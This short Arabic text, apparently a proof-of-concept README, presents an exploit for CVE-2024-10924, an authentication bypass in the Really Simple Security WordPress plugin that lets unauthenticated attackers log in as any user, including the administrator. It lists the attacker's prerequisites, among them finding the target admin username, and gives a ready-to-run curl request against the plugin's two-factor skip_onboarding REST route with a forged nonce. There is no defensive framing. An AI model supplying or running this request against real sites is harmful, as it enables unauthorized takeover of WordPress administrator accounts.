
استغلال لـ CVE-2024-10924، وهو تجاوز مصادقة حرج في إضافة Really Simple Security لـ WordPress (الإصدارات 9.0.0-9.1.1.1). يسمح للمهاجمين غير المصادق عليهم بتسجيل الدخول كأي مستخدم عبر خلل في واجهة برمجة تطبيقات المصادقة الثنائية.
CVE-2024-10924 هي ثغرة أمنية حرجة لتجاوز المصادقة في إضافة Really Simple Security لنظام ووردبريس (الإصدارات 9.0.0 إلى 9.1.1.1). تسمح هذه الثغرة للمهاجمين غير الموثقين بتسجيل الدخول كأي مستخدم (بما في ذلك المسؤول) من خلال استغلال عيب في واجهة برمجة تطبيقات المصادقة الثنائية (2FA).
موقع ووردبريس يعمل بإصدار ضعيف من إضافة Really Simple Security. تثبيت Python 3.x أو cURL للاختبار. اسم مستخدم المشرف المستهدف لووردبريس (قد يكون تعداد المستخدمين مطلوبًا).
curl --request POST "http://{url}/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding" -H "Content-Type: application/json" -d '{"user_id": 1, "login_nonce": "invalid_nonce"}' -v